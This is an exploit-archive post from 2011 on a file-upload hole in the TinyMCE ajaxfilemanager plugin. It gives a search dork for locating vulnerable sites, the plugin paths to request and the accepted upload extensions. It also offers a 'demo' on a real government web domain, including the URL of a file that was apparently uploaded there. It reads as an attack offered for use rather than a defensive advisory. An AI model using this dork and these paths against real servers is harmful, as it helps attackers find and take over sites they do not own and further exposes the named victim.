TinyMCE AjaxFileManager Shell Upload



EKU-ID: 370 CVE: OSVDB-ID:
Author: Dr Trojan Published: 2011-05-31 Verified: Not Verified
Download:

Rating

☆☆☆☆☆
Home


#########################################################
# Title : TinyMCE ajaxfilemanager Upload Vulnerability
# Author: Dr Trojan
# Greets to all my friends and everyone i know (www.paksecteam.com)
# Vendor: http://www.phpletter.com/Demo/Tinymce-Ajax-File-Manager/
# Email : urduhack@gmail.com
# Date : 29/05/2011
# Dork : "tiny_mce/plugins/ajaxfilemanager"
# Category  : PHP [File Upload Vulnerability]
# Tested on: [Windows 7, Linux Ubuntu]
#########################################################
Exploit
# http://
[localhost]/[path]/jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php
# http://
[localhost]/jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php
# File Extention [.txt],[.jpg],[gif],[bmp]
Demo
http://sns.yhgs.gov.cn/plugins/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php#
Preview
http://sns.yhgs.gov.cn/uploaded/temp/trojan.txt